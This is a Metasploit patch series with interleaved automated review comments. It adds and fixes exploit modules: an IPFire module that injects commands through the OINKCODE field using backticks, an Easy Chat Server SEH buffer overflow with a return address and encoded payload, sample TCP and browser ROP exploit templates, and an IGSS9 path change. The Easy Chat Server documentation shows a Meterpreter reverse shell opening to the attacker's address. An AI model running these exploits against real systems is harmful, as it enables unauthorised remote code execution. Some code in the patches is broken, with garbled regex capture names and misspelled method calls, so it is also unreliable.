@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Automatic Target', {}] ], 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jun 09 2016' + 'DisclosureDate' => 'Jun 09 2017' ) ) @@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote OptString.new('USERNAME', [ true, 'User to login with', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', '']), Opt::RPORT(444) - ], self.class + ] ) end @@ -62,18 +62,18 @@ class MetasploitModule < Msf::Exploit::Remote # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179 # after a chat with @bcoles in IRC. res = send_request_cgi( - 'uri' => '/cgi-bin/pakfire.cgi', - 'method' => 'GET', + 'uri' => '/cgi-bin/pakfire.cgi', + 'method' => 'GET', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) ) fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body - if version && update && version == "2.19" && update.to_i <= 110 - Exploit::CheckCode::Appears + if version && update && version.eql? "2.19" && update.to_i <= 110 + CheckCode::Appears else - Exploit::CheckCode::Safe + CheckCode::Safe end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") 
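Review bot: `version.eql? "2.19" && update.to_i <= 110` in `check` does not do what it reads as: without parentheses the argument of `eql?` is the whole expression `"2.19" && update.to_i <= 110`, which evaluates to a boolean, so `version.eql?(true)`/`version.eql?(false)` is always false and `check` now reports `CheckCode::Safe` for every host, including the 2.19 core 100 build the documentation says was verified. Restore the previous comparison or parenthesize: `if version && update && version == "2.19" && update.to_i <= 110`. Independently, the description says versions below 2.19 are affected too, yet only an exact `"2.19"` is accepted, so a 2.17 host is marked Safe — worth a comment stating that only 2.19 is handled, or a looser comparison. As rendered here the regex shows `(?[\d.]{4})` and `(?[\d]+)` with no capture names, which would not compile; presumably `(?<version>...)` and `(?<update>...)` were lost in rendering, since the locals `version`/`update` depend on them.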
@@ -87,11 +87,10 @@ class MetasploitModule < Msf::Exploit::Remote res = send_request_cgi( 'uri' => '/cgi-bin/ids.cgi', 'method' => 'POST', - 'ctype' => 'application/x-www-form-urlencoded', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' => { - 'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" + 'Referer' => "#{datstore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" }, 'vars_post' => { 'ENABLE_SNORT_GREEN' => 'on', @@ -100,13 +99,14 @@ class MetasploitModule < Msf::Exploit::Remote 'OINKCODE' => "`#{payload.encoded}`", 'ACTION' => 'Download new ruleset', 'ACTION2' => 'snort' - }, + } ) # success means we hang our session, and wont get back a response if res - fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + else + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") end rescue ::Rex::ConnectionError From bc826cb82426209333eeeec87b1380a849b63a88 Mon Sep 17 00:00:00 2001 From: Mzack9999 Date: Tue, 20 Jun 2017 00:36:59 +0200 Subject: [PATCH 10/63] Easy Chat Server From 2.0 to 3.1 - Buffer Overflow (SEH) exploit --- .../windows/http/easychatserver_seh.rb | 62 +++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 modules/exploits/windows/http/easychatserver_seh.rb diff --git a/modules/exploits/windows/http/easychatserver_seh.rb b/modules/exploits/windows/http/easychatserver_seh.rb new file mode 100644 index 0000000000..906614f189 --- /dev/null +++ b/modules/exploits/windows/http/easychatserver_seh.rb 
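Review bot: `datstore['SSL']` in the new `Referer` line is a typo for `datastore`, so the expression raises `NameError` as soon as `exploit` builds the request; the corrected line is `'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"`. In the second hunk the comment says a hung request with no response is the success case, yet the new `else` branch turns exactly that nil response into `fail_with(Failure::UnexpectedReply, "... no response")`, which contradicts the comment and aborts a run in which the handler may already hold a session; `vprint_status` there matches the stated intent better than `fail_with`. The enclosing `begin`/`rescue` of `exploit` starts outside the hunk.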
@@ -0,0 +1,62 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + #include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)', + 'Description' => %q{ + This module exploits a buffer overflow during user registration in Easy Chat Server software. + }, + 'Author' => + [ + 'Aitezaz Mohsin', #POC + 'Marco Rivoli ' #Metasploit + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '42186' ], + ], + 'Privileged' => true, + 'Payload' => + { + 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ], + ], + 'DefaultOptions' => { + 'RPORT' => 80, + 'EXITFUNC' => 'thread', + 'ENCODER' => 'x86/alpha_mixed' + }, + 'DisclosureDate' => 'Oct 09 2017', + 'DefaultTarget' => 0)) + end + + def exploit + sploit = rand_text_alpha_upper(217) + sploit << "\xeb\x06\x90\x90" + sploit << [target.ret].pack('V') + sploit << payload.encoded + sploit << rand_text_alpha_upper(200) + sploit << [target.ret].pack('V') + + request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register" + connect + sock.put(request) + handler + disconnect + end +end From 0b04dc05844b48a95e31c415c87ec9f10b296643 Mon Sep 17 00:00:00 2001 From: Mzack9999 Date: Tue, 20 Jun 2017 00:52:29 +0200 Subject: [PATCH 11/63] Correct EDB Number --- modules/exploits/windows/http/easychatserver_seh.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
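Review bot: `'DisclosureDate' => 'Oct 09 2017'` is almost four months after the commit date (20 Jun 2017), so it cannot be a disclosure date and should be corrected against the EDB reference (which the next patch in the series changes to `42155`). The `'Name'` misspells "Registration" (`Registeration`), and the commented-out `#include Msf::Exploit::Remote::HttpClient` is dead text that should be dropped rather than left as a hint. The one-sentence `'Description'` could state the affected versions the target already names (2.0 to 3.1) so the module is self-describing in `info` output.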
diff --git a/modules/exploits/windows/http/easychatserver_seh.rb b/modules/exploits/windows/http/easychatserver_seh.rb index 906614f189..a49c33912c 100644 --- a/modules/exploits/windows/http/easychatserver_seh.rb +++ b/modules/exploits/windows/http/easychatserver_seh.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'EDB', '42186' ], + [ 'EDB', '42155' ], ], 'Privileged' => true, 'Payload' => From af4eb0fbe3e9b9a12b87587bf2bafe74aa4a0487 Mon Sep 17 00:00:00 2001 From: Mzack9999 Date: Tue, 20 Jun 2017 00:55:18 +0200 Subject: [PATCH 12/63] Corrected shellcode --- modules/exploits/windows/http/easychatserver_seh.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/windows/http/easychatserver_seh.rb b/modules/exploits/windows/http/easychatserver_seh.rb index a49c33912c..b6973d7375 100644 --- a/modules/exploits/windows/http/easychatserver_seh.rb +++ b/modules/exploits/windows/http/easychatserver_seh.rb @@ -51,7 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote sploit << [target.ret].pack('V') sploit << payload.encoded sploit << rand_text_alpha_upper(200) - sploit << [target.ret].pack('V') request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register" connect From 3b248c78f35afa895ba06c51024d6b9ef10b37a0 Mon Sep 17 00:00:00 2001 
From: Brent Cook Date: Fri, 31 Mar 2017 10:58:43 -0500 Subject: [PATCH 13/63] resurrect old example modules, integrate into module tree --- lib/msf/core/modules/loader/base.rb | 3 +- lib/msf/core/modules/loader/directory.rb | 6 +- modules/auxiliary/example.rb | 44 ++++++ .../example.rb} | 0 modules/exploits/example.rb | 95 ++++++++++++ modules/exploits/windows/browser/example.rb | 144 ++++++++++++++++++ modules/exploits/windows/http/dupscts_bof.rb | 2 - 7 files changed, 288 insertions(+), 6 deletions(-) create mode 100644 modules/auxiliary/example.rb rename modules/auxiliary/scanner/{udp_scanner_template.rb => udp/example.rb} (100%) create mode 100644 modules/exploits/example.rb create mode 100644 modules/exploits/windows/browser/example.rb diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 720ccce593..fea6343a51 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -173,7 +173,8 @@ class Msf::Modules::Loader::Base true } - loaded = namespace_module_transaction(type + "/" + module_reference_name, :reload => reload, &try_eval_module) + loaded = namespace_module_transaction(type + "/" + module_reference_name, + :reload => reload, &try_eval_module) unless loaded return false end diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb index 2dbf15cb84..e78d371f7d 100644 --- a/lib/msf/core/modules/loader/directory.rb +++ b/lib/msf/core/modules/loader/directory.rb 
@@ -28,12 +28,11 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base def each_module_reference_name(path, opts={}) whitelist = opts[:whitelist] || [] ::Dir.foreach(path) do |entry| + full_entry_path = ::File.join(path, entry) type = entry.singularize - unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type) - next - end + next unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type) full_entry_pathname = Pathname.new(full_entry_path) @@ -43,6 +42,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base entry_descendant_pathname = Pathname.new(entry_descendant_path) relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname) relative_entry_descendant_path = relative_entry_descendant_pathname.to_s + next if File::basename(relative_entry_descendant_path) == "example.rb" # The module_reference_name doesn't have a file extension module_reference_name = module_reference_name_from_path(relative_entry_descendant_path) diff --git a/modules/auxiliary/example.rb b/modules/auxiliary/example.rb new file mode 100644 index 0000000000..04b8920396 --- /dev/null +++ b/modules/auxiliary/example.rb 
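Review bot: The new `example.rb` exclusion is keyed on a bare basename with no explanation, so any genuine module that happens to be called example.rb anywhere under the tree is silently dropped and a future reader has no hint why; a one-line comment such as `# Skip the sample/template modules that now live in the module tree so they are never loaded as real modules` would make the intent explicit. The check also uses `File::basename` while the rest of this method uses the `::File.directory?` form; `next if ::File.basename(relative_entry_descendant_path) == 'example.rb'` keeps the style consistent. The enclosing each_module_reference_name method continues beyond both hunks.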
@@ -0,0 +1,44 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +### +# +# This sample auxiliary module simply displays the selected action and +# registers a custom command that will show up when the module is used. +# +### +class MetasploitModule < Msf::Auxiliary + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Sample Auxiliary Module', + # The description can be multiple lines, but does not preserve formatting. + 'Description' => 'Sample Auxiliary Module', + 'Author' => ['Joe Module '], + 'License' => MSF_LICENSE, + 'Actions' => + [ + ['Default Action'], + ['Another Action'] + ] + )) + + end + + def run + print_status("Running the simple auxiliary module with action #{action.name}") + end + + # auxiliary modules can register new commands, they all call cmd_* to + # dispatch them + def auxiliary_commands + return { "aux_extra_command" => "Run this auxiliary test commmand" } + end + + def cmd_aux_extra_command(*args) + print_status("Running inside aux_extra_command(#{args.join(" ")})") + end + +end diff --git a/modules/auxiliary/scanner/udp_scanner_template.rb b/modules/auxiliary/scanner/udp/example.rb similarity index 100% rename from modules/auxiliary/scanner/udp_scanner_template.rb rename to modules/auxiliary/scanner/udp/example.rb diff --git a/modules/exploits/example.rb b/modules/exploits/example.rb new file mode 100644 index 0000000000..82e225e634 --- /dev/null +++ b/modules/exploits/example.rb 
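Review bot: The help text returned by `auxiliary_commands` contains a typo that surfaces verbatim in the console's command help: `"Run this auxiliary test commmand"` should read `"Run this auxiliary test command"`. The `'Author' => ['Joe Module ']` entry ends in a trailing space, which looks like a dropped address suffix in this rendering; either restore it or trim to `'Joe Module'`. Since this sample is what new module authors copy, small slips here get propagated.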
@@ -0,0 +1,95 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +### +# +# This exploit sample shows how an exploit module could be written to exploit +# a bug in an arbitrary TCP server. +# +### +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + # + # This exploit affects TCP servers, so we use the TCP client mixin. + # See ./documentation/samples/vulnapps/testsrv/testsrv.c for building the + # vulnerable target program. + # + include Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + # The Name should be just like the line of a Git commit - software name, + # vuln type, class. It needs to fit in 50 chars ideally. Preferably apply + # some search optimization so people can actually find the module. + # We encourage consistency between module name and file name. + 'Name' => 'Sample Exploit', + 'Description' => %q{ + This exploit module illustrates how a vulnerability could be exploited + in an TCP server that has a parsing bug. + }, + 'License' => MSF_LICENSE, + 'Author' => ['skape'], + 'References' => + [ + [ 'OSVDB', '12345' ], + [ 'EDB', '12345' ], + [ 'URL', 'http://www.example.com'], + [ 'CVE', '1978-1234'], + ], + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00", + }, + 'Targets' => + [ + # Target 0: Windows All + [ + 'Windows XP/Vista/7/8', + { + 'Platform' => 'win', + 'Ret' => 0x41424344 + } + ], + ], + 'DisclosureDate' => "Apr 1 2013", + # Note that this is by index, rather than name. It's generally easiest + # just to put the default at the beginning of the list and skip this + # entirely. + 'DefaultTarget' => 0)) + end + + # + # The sample exploit just indicates that the remote host is always + # vulnerable. 
+ # + def check + Exploit::CheckCode::Vulnerable + end + + # + # The exploit method connects to the remote service and sends 1024 random bytes + # followed by the fake return address and then the payload. + # + def exploit + connect + + print_status("Sending #{payload.encoded.length} byte payload...") + + # Build the buffer for transmission + buf = rand_text_alpha(1024) + buf << [ target.ret ].pack('V') + buf << payload.encoded + + # Send it off + sock.put(buf) + sock.get_once + + handler + end + +end + diff --git a/modules/exploits/windows/browser/example.rb b/modules/exploits/windows/browser/example.rb new file mode 100644 index 0000000000..177482f92a --- /dev/null +++ b/modules/exploits/windows/browser/example.rb 
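Review bot: `check` returns `Exploit::CheckCode::Vulnerable` without probing the target, and because this is the sample new authors copy it teaches the wrong default: `Vulnerable` is meant for a confirmed condition, so an unconditional result should be `Exploit::CheckCode::Unknown` (or `Detected` after an actual banner check), with the comment above it adjusted to say so. In `exploit`, `sock.get_once` follows the overflow with no timeout or nil handling, so a server that dies on the buffer (the expected outcome) leaves the read waiting for the default timeout before `handler` runs; either drop the read or add a comment explaining why it is wanted. Minor wording in the description: `in an TCP server` should be `in a TCP server`.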
@@ -0,0 +1,144 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +### +# +# This exploit sample demonstrates how a typical browser exploit is written using commonly +# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray. +# +### +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb + include Msf::Exploit::Remote::BrowserAutopwn + + # Set :classid and :method for ActiveX exploits. For example: + # :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}", + # :method => "SetShapeNodeType", + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "8.0", + :ua_maxver => "10.0", + :javascript => true, + :os_name => OperatingSystems::Match::WINDOWS, + :rank => NormalRanking + }) + + def initialize(info={}) + super(update_info(info, + 'Name' => "Module Name", + 'Description' => %q{ + This template covers IE8/9/10, and uses the user-agent HTTP header to detect + the browser version. Please note IE8 and newer may emulate an older IE version + in compatibility mode, in that case the module won't be able to detect the + browser correctly. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r' ], + 'References' => + [ + [ 'URL', 'http://metasploit.com' ] + ], + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', {} ], + [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ], + [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ], + [ 'IE 8 on Windows 7', { 'Rop' => :jre } ], + [ 'IE 9 on Windows 7', { 'Rop' => :jre } ], + [ 'IE 10 on Windows 8', { 'Rop' => :jre } ] + ], + 'Payload' => + { + 'BadChars' => "\x00", # js_property_spray + 'StackAdjustment' => -3500 + }, + 'Privileged' => false, + 'DisclosureDate' => "Apr 1 2013", + 'DefaultTarget' => 0)) + end + + def get_target(agent) + return target if target.name != 'Automatic' + + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + ie = agent.scan(/MSIE (\d)/).flatten[0] || '' + + ie_name = "IE #{ie}" + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' + when '6.2' + os_name = 'Windows 8' + when '6.3' + os_name = 'Windows 8.1' + end + + targets.each do |t| + if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) + return t + end + end + + nil + end + + def get_payload(t) + stack_pivot = "\x41\x42\x43\x44" + code = payload.encoded + + case t['Rop'] + when :msvcrt + print_status("Using msvcrt ROP") + rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) + + else + print_status("Using JRE ROP") + rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) + end + + rop_payload + end + + + def get_html(t) + js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch)) + html = %Q| + + | + + html.gsub(/^\t\t/, '') + end + + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + print_status("Requesting: #{request.uri}") + + target = get_target(agent) + if target.nil? 
+ print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + print_status("Target selected as: #{target.name}") + html = get_html(target) + send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' }) + end +end diff --git a/modules/exploits/windows/http/dupscts_bof.rb b/modules/exploits/windows/http/dupscts_bof.rb index f2479dc7ac..7425c4dfe3 100644 --- a/modules/exploits/windows/http/dupscts_bof.rb +++ b/modules/exploits/windows/http/dupscts_bof.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking From a8865252da5acc3355c14d06fdc45f3cb83d15bd Mon Sep 17 00:00:00 2001 From: Mzack9999 Date: Fri, 23 Jun 2017 14:12:04 +0200 Subject: [PATCH 14/63] Added exploit documentation --- .../windows/http/easychatserver_seh.md | 53 +++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 modules/exploits/windows/http/easychatserver_seh.md diff --git a/modules/exploits/windows/http/easychatserver_seh.md b/modules/exploits/windows/http/easychatserver_seh.md new file mode 100644 index 0000000000..eaf8a0744f --- /dev/null +++ b/modules/exploits/windows/http/easychatserver_seh.md 
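Review bot: In `get_target`, `os_name` stays nil when the `Windows NT` token is one the `case` does not cover (for example `5.2` for XP x64 / Server 2003), and the match loop then calls `t.name.include?(os_name)` with nil, which raises TypeError instead of falling through to the 404 branch in `on_request_uri`. Add `return nil if os_name.nil?` directly after the `case`, or give it an `else` branch that returns early. The `/MSIE (\d)/` and `/Windows NT (\d\.\d)/` patterns only accept single-digit versions, which is fine for the declared IE 8–10 targets but deserves a comment so the regexes are not widened without also extending the `case`.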
@@ -0,0 +1,53 @@ +## Description + +This module exploits a vulnerability in the EFS Easy Chat Server application, from version 2 to 3.1, affecting the username parameter in Registration page 'register.ghp', which is prone to a stack overflow vulnerability. + +This module allows a remote attacker to get a payload executed under the context of the user running the Easy Chat Server application + +## Vulnerable Application + +[Easy Chat Server](http://echatserver.com/) Easy Chat Server is a easy, fast and affordable way to host and manage real-time communication software. + +This module has been tested successfully on + +* Easy Chat Server 3.1 on Windows XP En SP3 + +Installers: + +[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe) + +## Verification Steps + +1. Start `msfconsole` +2. Do: `use exploits/windows/http/easychatserver_seh` +3. Do: `set rhosts [IP]` +4. Do: `exploit` +5. You should get your payload executed + +## Scenarios + +``` +marco@kali:~$ msfconsole -q +msf > use exploit/windows/http/easychatserver_seh +msf exploit(easychatserver_seh) > set RHOST 192.168.56.101 +RHOST => 192.168.56.101 +msf exploit(easychatserver_seh) > exploit + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Sending stage (957487 bytes) to 192.168.56.101 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200 + +meterpreter > sysinfo +Computer : MM-8B040C5B05D9 +OS : Windows XP (Build 2600, Service Pack 3). +Architecture : x86 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/windows +meterpreter > exit +[*] Shutting down Meterpreter... + +[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit +msf exploit(easychatserver_seh) > +``` From f9493f46d7ce8db9ef03f7aae20706c3fd8d80d8 Mon Sep 17 00:00:00 2001 
From: h00die Date: Sat, 24 Jun 2017 14:06:11 -0400 Subject: [PATCH 15/63] bcole fixes --- .../linux/http/ipfire_oinkcode_exec.rb | 24 ++++++++++--------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb index e4ad96b6ce..7dad137ea5 100644 --- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb +++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb @@ -66,17 +66,20 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) ) - fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? - fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 - /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body - if version && update && version.eql? "2.19" && update.to_i <= 110 + if res and res.code == 200 + /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body + end + + # now that we've pulled the info we need, check version. + if version && update && version.eql == '2.19' && update.to_i <= 110 CheckCode::Appears else CheckCode::Safe end + rescue ::Rex::ConnectionError - fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + CheckCode::Safe end end 
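Review bot: `version.eql == '2.19'` in the new version test calls a method `String` does not define (`eql?` is the predicate), so any host that actually reports a version and core update raises NoMethodError inside `check` instead of returning a CheckCode; restore it as `version == '2.19' && update.to_i <= 110`. Separately, the `rescue ::Rex::ConnectionError` branch now answers `CheckCode::Safe`, but an unreachable service is not evidence that the target is patched; `CheckCode::Unknown` is the honest result there. The regex's named-capture group names appear garbled in this rendering, so they could not be verified.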
@@ -84,13 +87,14 @@ class MetasploitModule < Msf::Exploit::Remote begin # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179 # after a chat with @bcoles in IRC. + vprint_status('Sending request') res = send_request_cgi( 'uri' => '/cgi-bin/ids.cgi', 'method' => 'POST', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' => { - 'Referer' => "#{datstore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" + 'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" }, 'vars_post' => { 'ENABLE_SNORT_GREEN' => 'on', @@ -102,11 +106,9 @@ class MetasploitModule < Msf::Exploit::Remote } ) - # success means we hang our session, and wont get back a response - if res - fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 - else - fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") + # success means we hang our session, and wont get back a response, so just check we get a response back + if res && res.code != 200 + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") end rescue ::Rex::ConnectionError From 66eb89e72a3a67910874921bfd24e41ca3d2cfa3 Mon Sep 17 00:00:00 2001 From: Mzack9999 Date: Sun, 25 Jun 2017 16:33:17 +0200 Subject: [PATCH 16/63] Exploit now uses HTTP mixin --- .../windows/http/easychatserver_seh.rb | 29 ++++++++++++++----- 1 file changed, 21 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/http/easychatserver_seh.rb b/modules/exploits/windows/http/easychatserver_seh.rb index b6973d7375..b006ffa586 100644 --- a/modules/exploits/windows/http/easychatserver_seh.rb +++ b/modules/exploits/windows/http/easychatserver_seh.rb 
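Review bot: With the `res.nil?` failure removed, a request that receives no answer at all is treated the same as the expected "payload hung the session" case, so a dropped connection or a silently filtering firewall looks like success and the module proceeds to wait on the handler with no indication. Since the comment already states why a nil response is expected, surface it to the user: `vprint_status('No response received; expected when the command executed') if res.nil?`. The `datstore` → `datastore` fix in the Referer header is correct and necessary. The surrounding `begin` block and its `rescue` continue outside the hunk.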
@@ -7,8 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking - include Msf::Exploit::Remote::Tcp - #include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, @@ -18,8 +17,8 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Author' => [ - 'Aitezaz Mohsin', #POC - 'Marco Rivoli ' #Metasploit + 'Marco Rivoli', #Metasploit + 'Aitezaz Mohsin' #POC ], 'License' => MSF_LICENSE, 'References' => @@ -52,10 +51,24 @@ class MetasploitModule < Msf::Exploit::Remote sploit << payload.encoded sploit << rand_text_alpha_upper(200) - request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register" - connect - sock.put(request) + res = send_request_cgi({ + 'uri' => normalize_uri(URI,'registresult.htm'), + 'method' => 'POST', + 'vars_post' => { + 'UserName' => sploit, + 'Password' => 'test', + 'Password1' => 'test', + 'Sex' => 1, + 'Email' => 'x@', + 'Icon' => 'x.gif', + 'Resume' => 'xxxx', + 'cw' => 1, + 'RoomID' => 4, + 'RepUserName' => 'admin', + 'submit1' => 'Register' + } + }) handler - disconnect + end end From 45af65199360bc05ef8179deb15031756f4dad5a Mon Sep 17 00:00:00 2001 From: syndrome5 Date: Tue, 4 Jul 2017 22:14:32 +0200 Subject: [PATCH 17/63] Fix issue generate/launch path Generate file in C:\ but try to launch it in Documents and Settings\All Users\Application Data\7T\ PoC with windows/meterpreter/reverse_tcp --- modules/exploits/windows/scada/igss9_misc.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/scada/igss9_misc.rb b/modules/exploits/windows/scada/igss9_misc.rb index 3c5cf7ea0a..99b161fa8a 100644 --- a/modules/exploits/windows/scada/igss9_misc.rb +++ b/modules/exploits/windows/scada/igss9_misc.rb 
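Review bot: `normalize_uri(URI,'registresult.htm')` passes the bare constant `URI`, which, unless this module defines its own `URI` constant somewhere not shown in the diff, resolves to Ruby's `::URI` module and produces a path like `/URI/registresult.htm` rather than `/registresult.htm`; the HttpClient convention is `normalize_uri(target_uri.path, 'registresult.htm')` with a `TARGETURI` option defaulting to `/`. The `res` returned by `send_request_cgi` is assigned but never inspected, and `handler` runs regardless, which is reasonable since the overflow is expected not to return, but a one-line comment saying so (`# the request is not expected to return; the SEH chain fires before a response is written`) would prevent a later "unused variable" cleanup from changing the flow. The `initialize` and `exploit` bodies extend beyond the hunk.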
@@ -117,8 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote pkt << "\x00\x00" pkt << "\x0A" pkt << "\x00"*31 - pkt << "#{base}Documents and Settings\\All Users\\Application Data\\7T\\#(unknown)\"" - pkt << "\x00"*143 + pkt << "#{base}#(unknown)\"" + pkt << "\x00"*163 #only for 1 caracter + .exe (i.exe for example) return pkt end From baff473caedc06271d390b9c175172465d8f9db0 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Wed, 5 Jul 2017 08:48:35 +0000 Subject: [PATCH 18/63] Add Metasploit RPC Console Command Execution module --- .../exploit/multi/misc/msf_rpc_console.md | 142 ++++++++++++++++ .../exploits/multi/misc/msf_rpc_console.rb | 152 ++++++++++++++++++ 2 files changed, 294 insertions(+) create mode 100644 documentation/modules/exploit/multi/misc/msf_rpc_console.md create mode 100644 modules/exploits/multi/misc/msf_rpc_console.rb diff --git a/documentation/modules/exploit/multi/misc/msf_rpc_console.md b/documentation/modules/exploit/multi/misc/msf_rpc_console.md new file mode 100644 index 0000000000..52c2d4f225 --- /dev/null +++ b/documentation/modules/exploit/multi/misc/msf_rpc_console.md 
